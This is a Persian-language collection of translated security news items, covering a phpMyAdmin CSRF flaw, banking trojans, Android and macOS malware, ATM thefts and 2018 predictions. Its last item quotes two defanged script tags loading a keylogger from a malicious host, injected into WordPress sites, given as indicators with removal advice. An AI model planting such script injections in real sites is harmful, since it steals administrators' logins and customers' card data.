نقص خطرناک گذارش شده در phpMyAdmin به مهاجمان اجازه می دهد به پایگاه داده ها آسیب بزنند

یک آسیب پذیری امنیتی نگران کننده در phpMyAdmin، (یکی از محبوب ترین برنامه های مدیریت پایگاه داده MySQL) گزارش شده است که می تواند مهاجمان را قادر سازد تا تنها با فریب مدیران و کلیک کردن آن ها روی لینک گزارش شده از راه دور توسط مهاجم، پایگاه داده را کنترل کنند.

Ashutosh Barot، یک محقق امنیتی هندی،  این آسیب پذیری را در نسخه phpMyAdmin 4.7.x کشف کرده است. از طریق این آسیب پذیری با جعل درخواست از طرف سایت می شود به محتوای پایگاه داده دسترسی پیدا کرد.

آسیب پذیری جعل درخواست از طرف سایت ، که با نام XSRF شناخته می شود، حمله ای است که در آن حمله کننده یک کاربر معتبر را به اجرای یک اقدام ناخواسته ترغیب می کند.

phpMyAdmin  نیز تاکیید کرد که “با فریب دادن یک کاربر به کلیک بر روی یک آدرس ساختگی، ممکن است عملیات پایگاه داده مضری مانند حذف رکوردها، حذف جداول و غیره انجام شود.”

phpMyAdmin یک ابزار مدیریت منبع رایگان و متن باز برای MySQL و MariaDB است و به طور گسترده ای برای مدیریت پایگاه داده  وب سایت های ایجاد شده با وردپرس، جوملا و بسیاری دیگر از سیستم های مدیریت محتوا مورد استفاده قرار می گیرد.

علاوه بر این، بسیاری از ارائه دهندگان خدمات میزبانی وب از phpMyAdmin استفاده می کنند تا به مشتریان خود راه مناسبی برای سازماندهی پایگاه های داده یشان ارائه دهند.

Barot همچنین یک ویدیو را، منتشر کرده است، که نشان می دهد چگونه یک مهاجم از راه دور می تواند مدیران پایگاه داده را به حذف یک جدول کامل از پایگاه داده تنها با فریب آنها برای کلیک روی یک لینک خاص با اهداف از پیش تعیین شده ترغیب کند.

Barot در پستی در وبلاگش توضیح داد که : ” یکی از ویژگی phpMyAdmin استفاده از متد درخواست GETو بعد از آن متد درخواست POST برای عملیات پایگاه داده مانند DROP TABLE table_name است. درخواست های GET باید در برابر حملات CSRF محافظت شوند. در این مورد درخواست POST میتواند از طریق URL انجام شود.ممکن است یک مهاجم سایبری مدیر پایگاه داده ای را برای کلیک روی یک دکمه به منظور حذف یک جدول از دیتابیس که مورد نظر مهاجم است ترغیب کند.”

با این حال، انجام این حمله به هیچ عنوان ساده نیست. برای تهیه یک لینک حمله CSRF، مهاجم باید از نام پایگاه داده و جداول هدف آگاهی داشته باشد.

Barot می گوید : “اگر یک کاربر یک کوئری را در پایگاه داده با کلیک کردن بر روی دکمه های insert، DROP و غیره اجرا کند، URL این درخواست حاوی نام پایگاه داده و نام جدول است. این آسیب پذیری می تواند منجر به افشای اطلاعات حساس از طریق URL در مکان های مختلف مانند تاریخچه مرورگر، تاریخچه SIEM، تاریخچه فایروال، تاریخچه ISP و غیره شود.”

Barot این آسیب پذیری را به توسعه دهندگان phpMyAdmin گزارش داد و یافته های خود را اثبات کرد و در پی آن phpMyAdmin 4.7.7 برای حل این مسئله منتشر شد. بنابراین توسعه دهندگان به مدیران پایگاه داده به شدت توصیه می کنند تا در اولین فرصت نسخه ی نصب شده در سیستم خود را به روز رسانی کنند.

منبع:

https://thehackernews.com/2018/01/phpmyadmin-hack.html

مروری بر تروجان های بانکی در سال 2017

امسال نیز مانند سال های گذشته تروجان‌های جدید ظاهر شدند، و تروجان های قدیمی دوباره احیا شدند و روش‌های جدیدی توسط مجرمان سایبری توسعه داده‌شده است که اکثر این روش ها بر روی‌داده‌های مالی تمرکز داشتند.

تروجان‌های بانکی در خبرهای امنیتی در سال جاری موضوع پرتکراری بوده‌اند، زیرا مجرمان راه‌های جدیدی برای کسب پول و اطلاعات از قربانیان خود پیداکرده‌اند.

Bogdan Botezatu، تحلیلگر ارشد بخش تهدیدات اینترنتی Bitdefender می‌گوید: “ما شاهد ظهور دوباره تروجان‌های بانکداری بوده‌ایم، که نشان می‌دهد این تروجان‌ها از اواسط سال 2012 تا 2013 در حال توسعه اند.”

برخلاف حملات نسبتاً ساده مانند باح افزارها، نرم‌افزارهای مخرب بانکی نیاز به چندین بخش مختلف دارد و برای راه‌اندازی و کسب درآمد دشوار هستند. Botezatu بیان کرد که این رشد تروجان ها می‌تواند ناشی از نشت کد سایر تروجان‌های بانکی و یا از اشباع بازار باج افزارها باشد.

بسیاری از تروجان‌های بانکی که ما در سال جاری شاهد آن بودیم، یادآور آن‌هایی هستند که درگذشته دیده‌ایم. مابقی آن‌ها از روش های قدیمی استفاده کرده اند و فقط به شیوه‌های جدید توزیع شده اند و قربانیان جدید را هدف قرار داده اند.

Terdot یکی از این تروجان بانکی که اولین بار در ماه اکتبر 2016 کشف شد. این تروجان برگرفته از کد منبع تروجان بانکی زئوس، پس از نشت منبع این کد در سال 2011 است. IcedID یکی دیگر از تروجان بانکی جدید است که در ماه سپتامبر ظاهر شد و دارای ویژگی‌های تروجان های Gozi، Zeus و Dridex است.

لیمور کسمم، مشاور امنیت اجرایی IBM Security درباره IcedID می‌گوید:”به‌طورکلی، این تروجان مشابه تروجان‌های بانکی دیگر است. “،. این قضیه بسیار نادر است که تروجان‌های بانکی خصوصیات خود را با یکدیگر به اشتراک نگذارند. مهاجمین روش های یکدیگر را کپی می‌کنند و ویژگی‌های جدیدی نظیر تکنیک‌های ضد اخاذی را برای پیشرفت بیشتر بدافزارها خود به آن اضافه می‌کنند.

منبع خبر: https://www.darkreading.com/attacks-breaches/9-banking-trojans-and-trends-costing-businesses-in-2017/d/d-id/1330690

فیس بوک به کاربران کمک می کند تا ایمیل های فیشینگ را شناسایی کنند

فیسبوک ابزار جدیدی را برای مقابله با حملات فیشینگ علیه این شرکت ارائه کرد. حملات فیشینگ اغلب تلاش می کنند تا کاربران را با صفحات ورود جعلی ببرند تا آن ها اطلاعات حساب کاربری خود را در این سایت مخرب وارد کنند. فیس بوک با استفاده از این ابزار جدید می خواهد به کاربران در جهت تشخیص ایمیل های صحیح از جعلی کمک کند تا در دام حملات فیشینگ قرار نگیرند.

از امروز، کاربران می توانند با مراجعه به بخش «تنظیمات امنیتی» خود (facebook.com/settings) «ایمیلهای اخیر درباره امنیت و ورود» را مشاهده کنند. در آنجا، فیس بوک لیستی از ایمیل های مربوط به امنیت را که اخیرا فرستاده شده است منتشر خواهد کرد.

فیس بوک از دامنه ای به نام Facebookmail.com برای ارسال ایمیل ها استفاده می کند. اگر کاربران به ایمیل‌هایی که ادعا می‌کنند از فیس بوک ارسال شده اند مشکوک می باشند می‌توانند به تنظیمات خود دسترسی رفته و بررسی کنند که آیا پیامهای ارسالی به آن ها قانونی هستند یا خیر.

در رابطه با این موضوع می توانید درسایت فیس بوک اطلاعات بیشتری را مشاهده کنید.

منبع خبر: https://www.darkreading.com/endpoint/facebook-helps-users-detect-phishing-emails/d/d-id/1330692

سازمان ها درباره هزینه های حفاظت از داده های ابری نگران هستند

هنگامی که به مبحث حفاظت از داده های ابری ورود می کنیم، اختلاف قابل توجهی بین مزایای ارائه شده در مقابل هزینه مصرف شده و مدیریت آن وجود دارد.

براساس یک نظرسنجی، 59 درصد از پاسخ دهندگان، صرفه جویی در هزینه را دلیل استفاده از AWS(Amazon Web Service) می دانند. سادگی و بهبود امنیت به عنوان دلایل دوم و سوم در این فهرست ذکر شده است. با این حال، 49 درصد از پاسخ دهندگان که در حال بررسی انتقال به فضای ابری هستند، هزینه را مانع اصلی می دانند.

به طور مشابه، 54٪ از پاسخ دهندگان، ابر را برای حفاظت از داده ها استفاده می کنند. هنگامی که به مبحث اعتماد به توانایی فضای ابر برای بازیابی داده ورود می کنیم، بخشی از پاسخ دهندگان، علاقه بسیار بالایی به ابر به دلیل سطوح اطمینان بالاتر آن در بازیابی داده ها نشان دادند. از سوی دیگر، بیشتر پاسخ دهندگان ( 82٪ ) به سیستم های داخلی برای بازگرداندن داده ها اعتقاد بیشتری دارند.

دیو پکر ( Dave Packer )، معاون رییس بازاریابی شرکت درووا گفت: “هرچند مهاجرت به ابرها در سال های اخیر به طور قابل ملاحظه ای افزایش یافته است، ولی هنوز هم بین قابلیت های فضای ابر و درک افراد از این قابلیت ها اختلاف نظر وجود دارد.” این تصور اشتباه همچنان ادامه دارد که ابر برای ذخیره سازی داده ها بیش از حد گران است و متخصصان فناوری اطلاعات اعلام می کنند که این هزینه ها به دلیل رشد داده ها و داده های تکراری در شرکت ها است. اما سازمان هایی که قبلا به انتقال به فضای ابر پرداخته اند، متوجه شده اند که با استفاده از ابر، هزینه ها و مقیاس ها می توانند بهینه سازی شوند و امنیت و کنترل بیشتری بر روی داده هایشان داشته باشند.”

منبع :

https://www.infosecurity-magazine.com/news/orgs-concerned-about-cloud-data

هزاران دستگاه اندرویدی به وسیله ی تروجان مخفی در برنامه Flashlight هدف قرار گرفتند

یک تروجان بانکی مخرب راهی جدید برای نفوذ به گوشی های اندرویدی کاربران با هدف قرار دادن مشتریان بانک های بزرگ بین المللی است.
BankBot  یکی از این تروجان هاست که چندین بار در سال جاری به فروشگاه گوگل، وارد شده است. آخرین نسخه از نرم افزارهای مخرب کشف شده در برنامه های Flashligh قرار گرفته است.

این کشف از طریق تحقیقات مشترک بین شرکت های امنیتی سایبری ESET، Avast و SfyLabs صورت گرفت.

تروجان بسیار زیرک خود را از طریق نرم افزار Flashligh بر روی گوشی های کاربران و برنامه های آنان قرار می دهد. کاربران از سراسر جهان از ایالات متحده گرفته تا استرالیا تحت تاثیر این حمله قرار گرفته اند.
Avast در وبلاگ امنیتی خود گفت: “نسخه جدید  Bankbot خودرادر برنامه هایی که به عنوان برنامه های Flashligh که به ظاهر قابل اعتماد هستند پنهان می کند.”

این تروجان با هدف جاسوسی از کاربران طراحی شده و جزئیات ورود به حساب بانکی آن ها راسرقت می کند و در نهایت به هکرها اجازه می دهد حساب های بانکی آنها را تخلیه کنند.
Avast اعلام کرد، BankBot یک پوشش UI جعلی را در برنامه های بانکی کاربران ایجاد می کند. هنگامی که کاربران اطلاعات ورود خود را تایپ می کنند، در واقع آنها را به مجرمان سایبری ارسال می کنند.

این ویروس حتی قادر است از شماره های تأیید اعتبار تراکنش (TANs) که در هنگام استفاده از برنامه های بانکی به کاربران ارسال می شود، جلوگیری کند.

گوگل مکررا BankBot را از فروشگاه Play حذف کرده است، اما این تروجان راه های جدیدی را برای نفوذ در برنامه های این فروشگاه پیدا کرده است . Avast بیان کرد که برخی از برنامه های درگیر در ارائه نرم افزارهای مخرب حتی دارای تأیید Play Protect بودند.
Avast گفت که اکثر نسخه های BankBot در طی چند روز حذف شده اند، اما بعضی از آنها در فروشگاه به مدت طولانی تری باقی مانده اند. به گفته این شرکت، هزاران دستگاه اندرویدی هم اکنون به این تروجان آلوده شده اند.

Avast نکتات زیر را برای دانلود برنامه ها خاطر نشان کرد. این اقدامات احتیاطی می تواند به جلوگیری از ورود بدافزارهایی مانند BankBot بر روی دستگاه شما کمک کند:
• دقت کنید که برنامه ای که استفاده می کنید یک برنامه بانکی تأیید شده است. درصورت مشاهده ی موارد عجیب و نامعلوم ، برای بررسی با بانک تماس بگیرید.
• از احراز هویت دو عامله استفاده کنید.
• فقط به برنامه های فروشگاه های معتبر اعتمادکنید و قبل از دانلود یک برنامه جدید، رتبه بندی کاربر را برای شکایت ها بررسی کنید.
• به مجوزهای درخواستی برنامه توجه کنید. برنامه Flashligh نباید به مخاطبین یا رسانه دسترسی داشته باشد.
• اغلب، نرم افزارهای مخرب خواهان تبدیل شدن به مدیر دستگاه برای کنترل دستگاه شما خواهند بود، این اجازه را به یک برنامه ندهید.
• از نرم افزارهای ضد ویروس موبایل استفاده کنید.

منبع:

https://sanvada.com/2017/12/05/thousands-hit-by-banking-malware-hidden-in-flashlight-apps/

بدافزار سیستم‌عامل مک با روشی نوآورانه به کاربران حمله می‌کند

بدافزار جدیدی که سیستم‌عامل‌های مک را مورد هدف قرار داده است از روشی نوآورانه برای پنهان کردن فعالیت خود استفاده می‌کند. به گفته محققان امنیتی، هدف اصلی این تکنیک جدید، جلوگیری از اعلام هشدار به کاربران درباره اجرای این بدافزار است.
این روش جدید HiddenLotus  نامیده می‌شود و از طریق یک نرم‌افزار به نام Lê Thu Hà یا (HAEDC) که فرمت آن ها pdf است توزیع می‌شود.
این بدافزار از ویژگی فایل قرنطینه معرفی‌شده در Leopard (Mac OS X 10.5) استفاده می‌کند (طبق این ویژگی فایل‌های دانلود شده از اینترنت به‌عنوان قرنطینه برچسب‌گذاری می‌شوند). اگر فایل دانلود شده، یک برنامه اجرایی باشد وقتی مهاجمان سعی می‌کنند این پرونده را اجرا کنند، باید یک پاپ‌آپ هشدار به کاربر نشان داده شود.

بدافزار HiddenLotus  نوعی جدید از بدافزار OceanLotus  است. OceanLotus  در تابستان امسال به‌عنوان یک سند ورد مایکروسافت مشاهده شد و توانست کاربران ویتنامی را هدف قرار دهد.

تفاوت اصلی این دو نوع بدافزار، آن است که بدافزار قبلی دارای یک پسوند.app مخفی بود که نشان می‌داد این پرونده یک برنامه کاربردی است، درحالی‌که HiddenLotus پسوند.pdf دارد و هیچ پسوند.app در این بدافزار جدید وجود ندارد.

البته به گفته کارشناسان، به‌احتمال‌زیاد این بدافزار از یک پسوند پنهان برای فریب سیستم‌عامل مک استفاده می‌کند. همچنین یک برنامه کاربردی نیاز ندارد که حتما پسوند.app را داشته باشد. یک برنامه در سیستم‌عامل مک درواقع یک پوشه با یک ساختار داخلی خاص به نام بسته نرم‌افزاری است، اما اگر یک پسوند.app به آن بدهید، آن پوشه به‌سرعت به یک برنامه تبدیل می‌شود.

وقتی کاربران روی این پوشه دو بار کلیک می‌کنند به‌جای باز کردن پوشه، یک فایل اجرایی باز می‌شود.
هنگامی‌که کاربر دو بار بر روی یک پوشه با یک پسوند ناشناخته، کلیلک می کند LaunchServices ساختار داخلی پوشه را موردبررسی قرار می‌دهد. به خاطر استفاده از یک عدد رومی در پسوند.pdf و ازآنجایی‌که برنامه‌ای روی دستگاه وجود ندارد که آن را باز کند، سامانه با آن مانند یک برنامه رفتار می‌کند، هرچند که این پوشه دارای یک پسوند app. نیست.
کارشناسان امنیتی بیان کردند که لیست گسترده‌ای از پسوندهایی که هکرها می‌توانند از آن سوءاستفاده کنند، وجود دارد. با توجه به این واقعیت، کاربران می‌توانند به‌آسانی فریب بخورند و فایل‌هایی را باز کنند که به نظر می‌رسد اسناد وُرد (دارای پسوند.doc)، صفحه گسترده‌ی اکسل (دارای پسوند.xls)، اسناد Pages  (دارای پسوند.pages) هستند.

منبع:http://virusguides.com/macos-backdoor-attacks-users-via-innovative-disguise-method/

هکرهای روسی 10 میلیون دلار از شبکه دستگاه‌های خودپرداز ربوده اند

نفوذ هکرها به دستگاه‌های بانکی بسیار گسترده شده است. این کلاه‌برداری می‌تواند به سادگی  پول نقد را از دستگاه‌های خودپرداز سرقت کنند. طبق گزارش‌های جدید محققان، هکرهایی موسوم به MoneyTaker توانسته‌اند در 18 ماه گذشته به 15 بانک آمریکایی و 3 بانک روسی حمله کنند و 10 میلیون دلار از شبکه دستگاه‌های خودپرداز آن ها را به سرقت ببرند. این هکرها با استفاده از دستگاه‌های انتقال بین‌بانکی و ربودن دستور پرداخت‌های مالی، این وجوه را از دستگاه‌های خودپرداز اخذ کرده‌اند.

اولین حمله شناسایی‌شده در بهار سال 2016 بود، ‌در این حمله  MoneyTaker شبکه STAR ( بزرگ‌ترین سیستم انتقال پیام برای دستگاه‌های خودپرداز در ایالات‌متحده) را تحت تأثیر قرارداد. آن‌ها همچنین شبکه AW CRB روسیه را به خطر انداخته و اسناد بسیار مهمی را از سیستم انتقال داده‌ی OceanSystems که توسط 200 بانک آمریکایی مورداستفاده قرار می‌گرفت به سرقت برده‌اند.
هنوز مشخص نیست که چه فرد یا دولتی از گروه MoneyTaker حمایت می‌کند. به نظر می‌رسد این گروه بسیار هوشمندانه رفتار می‌کند زیرا پس از گذشت یک سال محققان توانستند به‌تازگی از فعالیت‌های این گروه آگاهی پیدا کنند. هکرهای این گروه بارها روش‌ها و ابزارهای خود را تغییر دادند تا کسی نتواند از نحوه فعالیت آن‌ها آگاه شود. به همین دلیل است که آن‌ها توانسته‌اند تاکنون گواهینامه‌های امنیتی بسیاری از دولت فدرال آمریکا، بانک مرکزی آمریکا، شرکت مایکروسافت و یاهو را به سرقت ببرند و در عین حال شناسایی نشوند.
این هکرها به‌طور مستقیم حساب های کاربران را تحت تأثیر قرار نمی‌دهند، بلکه بیشتر بر روی تصاحب انتقال‌های بین‌بانکی تمرکز کرده‌اند. بااین‌حال، موفقیت های این گروه نشان دهنده ی پیچیدگی فعالیت آن ها و آسیب‌پذیری بانک‌ها است.

 

منبع:

https://www.engadget.com/2017/12/11/russian-hackers-steal-10m-from-atms/

هشدار: مهاجمان می توانند به برنامه‌های قانونی اندروید حمله کنند!!!

بر اساس تحقیقاتی که اخیرا انجام شده، آسیب‌پذیری جدیدی در دستگاه‌های اندرویدی کشف‌شده است که باعث می‌شود مهاجمان بتوانند به برنامه‌های قانونی سیستم حمله کرده و کدهای مخرب را درونشان تزریق کنند.
این آسیب‌پذیری که Janus نامیده می‌شود، برنامه‌های اندوردیدی را بدون تحت تأثیر قرار گرفتن گواهی‌نامه‌های تائید امضا تغییر می دهد و کدهای مخرب را به برنامه تزریق می کند و ان برنامه همانند برنامه اصلی به کار خود ادامه دهد. درواقع همچنان به‌عنوان یک برنامه قابل‌اعتماد برای اندروید به‌حساب می آید.
محققان شرکت امنیتی GuardSquare می‌گویند این مشکل، برنامه‌های نصب‌شده با امضا APK v1 در نسخه‌های اندروید 5.0 و بعدازآن را تحت تأثیر قرار داده است.

محققان شرکت GuardSquare بیان کردند: «هنگامی‌که کاربر یک برنامه را به‌روزرسانی می‌کند، امضاء نسخه‌ی اصلی با امضای برنامه بارگیری شده مقایسه می شود. اگر امضاءها مطابقت داشته باشند، سیستم اندروید به‌روزرسانی را نصب می‌کند. برنامه‌ی به‌ روز شده، مجوزهای برنامه‌ی اصلی را به ارث می‌برد؛ بنابراین، مهاجمان می‌توانند از آسیب‌پذیری Janus برای گمراه کردن فرآیند به‌روزرسانی استفاده کنند و با فریب دادن سیستم‌های اندرویدی یک برنامه با کدهای مخرب را جایگزین برنامه اصلی کنند.»
طبق گفته شرکت GuardSquare، این آسیب‌پذیری نمی‌تواند از طریق فروشگاه گوگل پلی انجام شود و برنامه‌های به روز شده از این طریق امن هستند. ازآنجاکه این آسیب‌پذیری نسخه اندروید ۷ و بعد از آن را که از امضاء APK v2 پشتیبانی می‌کند تحت تأثیر قرار نمی‌دهد، به کاربرانی که نسخه‌های قدیمی‌تر اندروید را اجرا می‌کنند، به‌شدت توصیه می‌شود که سیستم‌عامل دستگاه خود را ارتقاء دهند.

منبع:

https://www.theregister.co.uk/2017/12/08/android_flaw_lets_attack_code_slip_into_signed_apps/

سال جدید، تهدیدات جدید: 5 پیش بینی امنیتی برای سال 2018

سرعت رشد ابداعات حوزه ی تکنولوژی ، شرکت های صنعتی را برآن داشته است تا از ابزار های دیجیتال مانند هوش مصنوعی ، یادگیری ماشین ، واقعیت مجازی و … هرچه بیشتر در کسب و کار خود بهره ببرند.

با وجود این تغییرات برطبق تحقیق انجام شده توسط Gartner با عنوان (10 استراتژی برتر برای سال 2018)، 40 درصد از کمپانی ها از هم اکنون اقدام به بهره گیری از راهکارهای هوش مصنوعی کرده اند. این تکنولوژی ها فرصت های سودجویی تازه ای برای سرمایه گذاری مجرمین سایبری به وجود آورده است.

تلاقی رویداد های گوناگون امنیتی سازمان ها کوچک و بزرگ را مجبور به بازنگری در شیوه ی تامین امنیت اطلاعاتی خود در سرمایه گذاری ها و درس گرفتن از اشتباهات گذشته کرده است. در عین حال که امید به آینده داریم و سال جدید را سالی با راهکارهای امنیتی تازه می بینیم اما می دانیم که تهدیدات تازه و نوظهوری نیز سال 2018 را تحت تاثیر قرار خواهد داد.

IBM X-Force تحقیقی انجام داده و پنج مورد از مهم ترین موضوعات امنیتی در سال 2018 را بیان کرده است:

  1. AI دربرابر AI :

در سال آینده هنگامیکه مجرمین سایبری از یادگیری ماشین برای گمراه کردن رفتار انسان استفاده خواهند کرد شاهد حملات مبتنی بر هوش مصنوعی خواهیم بود. صنعت امنیت سایبری نیازمند به کارگیری ابزارهای هوش مصنوعی برای مقابله هرچه بهتر با تهدیدات جدید خواهند بود.

همانطورکه هوش مصنوعی تبدیل به جریان اصلی عرصه ی IT می شود مجرمین سایبری نیز سعی در استفاده از ابزارهای هوش مصنوعی نه تنها برای اتوماتیک کردن و تسریع فعالیت های قبلی خود بلکه برای حملات مهندسی اجتماعی و حملات phishing بهره خواهند برد.

  1. آفریقا هدفی جدید برای تهدیدات امنیتی

تیم تحقیقاتی IBM X-Force براین باوراست که آفریقا با توجه به پیشرفت تکنولوژی ، پیشرفت اقتصادی و افزایش تعداد بازیگران تهدید کننده ی محلی که داشته است بیشترین ظرفیت برای رویداد های سایبری تاثیرگذار را خواهد داشت. در سال 2018 آفریقا به هدفی جدید برای تهدیدات امنیتی تبدیل خواهد شد.

  1. بحران هویت:

دیتای مربوط به بیش از 2 میلیون رکورد که در سال 2017 به سرقت رفت در مقیاسی که تاکنون دیده نشده مورد استفاده قرار خواهد گرفت. قانون محدود کردن استفاده کردن از داده ی به سرقت رفته سبب میشود کمپانی ها از  Social Security numbers (SSNs) استفاده نکنند. جایگزین های SSN می تواند blockchain ، ID هوشمند یا e-card ها ، بیومتریک و یا ترکیب این متد ها باشد. شرکت ها به متد های ایمن تر که از اهراز هویت مبتنی برریسک و تحلیل گر رفتار استفاده می کنند روی خواهند آورد.

  1. باج افزارها دستگاه های IoT را از کار خواهند انداخت

باج افزارها به جای قفل کردن دسکتاپ ها این بار به دستگاه های IoT حمله خواهند کرد. سازمان های بزرگ که از دستگاه های IoT مانند دوربین های امنیتی و DVR ها به طور ویژه ای از این باج افزارها آسیب خواهند دید.

  1. سرانجام پاسخ درست را خواهیم گرفت:

2018 سالی خواهد بود که در آن یک شرکت راهکاری سریع و مناسب برای جلوگیری از سرقت داده و یا حمله های سایبری در مقیاس بزرگ ارائه خواهد کرد.

با پیاده سازی GDPR  در می سال 2018 فعالان حوزه ی کسب و کار در اتحادیه ی اروپا با قوانین سخت تری در مورد حفاظت اطلاعات روبه رو خواهند شد و باید هرگونه سرقت اطلاعات را در مدت 72 ساعت گزارش دهند درغیر اینصورت 4 درصد از درآمد خود را به عنوان جریمه پرداخت خواهند کرد و ضمنا به مشتریان خود نیز در مورد سرقت اطلاعات گزارش دهند. با در نظرگرفتن این مجازات ها، سازمان ها بیشتر تشویق می شوند تا دربرابر این تهدیدات سازوکاری در نظر بگیرند و نسبت به عواقب ناشی از سرقت اطلاعاتی خود هوشیار باشند.

 

منبع:

https://securityintelligence.com/new-year-new-threats-five-security-predictions-that-will-take-hold-in-2018/

بیش از 5500 سایت وردپرس به یک Keylogger آلوده شده اند!

هکر ها قصد دارند اطلاعات کاربران وردپرس را سرقت کنند

کاربران به طور گسترده از وردپرس برای ایجاد وب سایت ها یا وبلاگ های شخصی استفاده می کنند. از این رو هکرها می توانند اطلاعات ارزشمندی مانند نام ورود به سیستم، گذرواژه، آدرس ایمیل و غیره را از خیل عظیم کاربران سرقت کنند. از آن جا که برخی از شرکت ها هنوز هم از وردپرس برای راه اندازی فروشگاه آنلاین خود استفاده می کنند مجرمان با استفاده از یک keylogger، به راحتی می توانند اطلاعات کارت اعتباری یا کارت بدهی مشتریان را سرقت کنند.

 

این اسکریپت مخرب بر روی Back-end و Front-End وردپرس بارگذاری می شود و در هنگام ورود مدیر به پنل کاربری نام کاربری و رمز عبور او را سرقت می کند. کد های کشف شده که برای چسباندن keylogger استفاده شده است عبارتند از:

  1. < script type=’text/javascript’ src=’hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js’ >< /script >;

 

  1. < script type=’text/javascript’ src=’hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js’ >< /script >.

 

به گفته دنیس سینگوبکو، تحلیلگر ارشد بد افزار ها در Sucuri، این اسکریپت در فایل functions.php قرار دارد که در همه قالب های وردپرس استفاده می شود. مخفی شدن این کد در یک فایل قانونی، تشخیص و پیدا کردن keylogger را سخت تر کرده است. در حال حاضر، حدود 5496 سایت وردپرس به این keylogger آلوده هستند.

داده های سرقت شده به سرور مجازی ارسال می شوند. محققان سایبری شرکت Sucuri متوجه شدند که توسعه دهندگان این کد مخرب از ماه آوریل فعال بوده و حداقل سه حمله انجام داده اند.

این مجرمان در ماه آوریل از اسکریپت cors.js برای نمایش تبلیغات بنری در وب سایت ها استفاده کردند .  علاوه بر این، هکرهای مذکور، اسکریپت های مخرب دیگری را تحت عنوان فایل های جی کوئری و تحلیلگر گوگل در ماه نوامبر منتشر کرده اند.

توصیه ای برای کاربران ورد پرس:

اولین چیزی که به قربانیان توصیه می شود این است که همه گذرواژه ها و نامهای کاربری خویش را تغییر دهند زیرا ممکن است به خطر افتاده باشد. علاوه بر این، با بانک های خود تماس بگیرند تا از مشکلات احتمالی مطلع شده و از معاملات غیر قانونی از حساب بانکی خود جلوگیری کنند.

همچنین کارشناسان Sucuri پیشنهاد می کنند اقدامات زیر را نیز انجام دهید:

همان طور که قبلا گفته شد، کد مخرب در فایل function.php واقع در قالب وردپرس قرار دارد. شما باید تابع add_js_scripts و تمام جمل واره های add_action که شامل add_js_scripts هستند را حذف کنید.

 

منبع:

https://www.2-spyware.com/more-than-5500-wordpress-sites-are-infected-with-a-keylogger